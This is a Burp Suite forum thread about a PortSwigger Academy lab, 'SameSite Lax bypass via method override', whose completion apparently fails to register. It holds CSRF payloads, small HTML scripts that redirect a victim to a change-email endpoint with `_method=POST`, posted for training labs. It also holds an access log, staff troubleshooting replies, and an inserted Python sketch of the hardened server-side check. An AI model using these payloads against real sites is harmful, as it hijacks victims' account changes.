The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.


SameSite Lax bypass via method override Lab Broken

Z3r0 | Last updated: Jul 13, 2024 03:59PM UTC

This lab is broken. When sending the payload to the victim (the correct one listed in the solution and with a different mail), the victim simply does not visit it, as you can see in the access log: I don't see an IP address other than my own. I have tried restarting the lab and changing the browser, but it doesn't work either.

- Payload

```
<html>
<body>
<script>
document.location="https://0ab600b403cffccd80ba7c7b008700a5.web-security-academy.net/my-account/change-email?email=abcd%40gmail.com&_method=POST"
</script>
</body>
</html>
```

- Access log

```
MY_IP 2024-07-13 15:49:39 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:49:40 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:13 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:13 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:15 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:15 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:20 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:20 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:26 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:26 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:26 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:53:49 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:18 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:18 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:20 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:20 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:25 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:25 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:58 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
```
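Added example, not part of the post above and not PortSwigger's code: the payload is a top-level GET navigation carrying `_method=POST`, so a `SameSite=Lax` session cookie still accompanies it, and this sketch models the server-side check that keeps such a request from being treated as a POST. All function names and the `lab.example` URL are hypothetical and constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
OVERRIDABLE = {"PUT", "PATCH", "DELETE"}  # what a real POST form may be upgraded to

# Constructed request, shaped like the navigation in the post (placeholder host).
NAV_URL = "https://lab.example/my-account/change-email?email=a%40b.example&_method=POST"

def lax_cookie_sent(method, top_level_navigation, same_site_request):
    """Browser side: cross-site, a Lax cookie is attached only to
    top-level navigations that use a safe method on the wire."""
    if same_site_request:
        return True
    return top_level_navigation and method.upper() in SAFE_METHODS

def effective_method_weak(method, url, form=None):
    """Weak: honours _method from the query string on any request."""
    override = parse_qs(urlsplit(url).query).get("_method")
    return override[0].upper() if override else method.upper()

def effective_method_hardened(method, url, form=None):
    """Hardened: only a real POST may be overridden, only from its body,
    and never into another POST or a safe method."""
    method = method.upper()
    if method != "POST":
        return method  # a GET stays a GET whatever the query string says
    override = (form or {}).get("_method", "").upper()
    return override if override in OVERRIDABLE else method

def email_change_runs(resolve, method, url, cookie_sent):
    """Assumed handler gate: the change runs for an authenticated POST."""
    return cookie_sent and resolve(method, url) == "POST"

if __name__ == "__main__":
    cookie = lax_cookie_sent("GET", top_level_navigation=True, same_site_request=False)
    for name, resolve in (("weak", effective_method_weak),
                          ("hardened", effective_method_hardened)):
        print(name, "-> email change runs:",
              email_change_runs(resolve, "GET", NAV_URL, cookie))
```

Pinning the accepted methods on the route itself, so the email-change endpoint answers 405 to anything whose wire method is not POST, gives the same result without touching the override logic.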

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 01:00PM UTC

Hi,

If you use a standard version of Chrome, does this then allow you to solve this particular lab?

Z3r0 | Last updated: Jul 23, 2024 06:51PM UTC

Same thing

Ben, PortSwigger Agent | Last updated: Jul 24, 2024 07:36AM UTC

Hi,

Are you able to provide us with some details of the payload and browser you are using?

Haxmaul | Last updated: Aug 29, 2024 05:23PM UTC

Mine shows delivered to victim but still not getting the Solved check mark. No issues with other labs so far. Anyone figure this out? Tested using Burp's browser and my Chrome (Version 128.0.6613.114 (Official Build) (64-bit)). When I "view exploit", it updates my email as it should.

```
<html>
<body>
<script>
document.location="https://0a4a00b803a634ed819fa1bb01cf0061.web-security-academy.net/my-account/change-email?email=3abcdfghertfg%40gmail.com&_method=POST"
</script>
</body>
</html>
```

Dominyque, PortSwigger Agent | Last updated: Aug 30, 2024 09:15AM UTC

Hi Haxmaul,

If you do not URL encode the email address, does this then work? Additionally, are you categorically sure that you are changing the email address in your exploit, after you view the exploit and before delivering it to the victim?

Haxmaul | Last updated: Aug 30, 2024 06:07PM UTC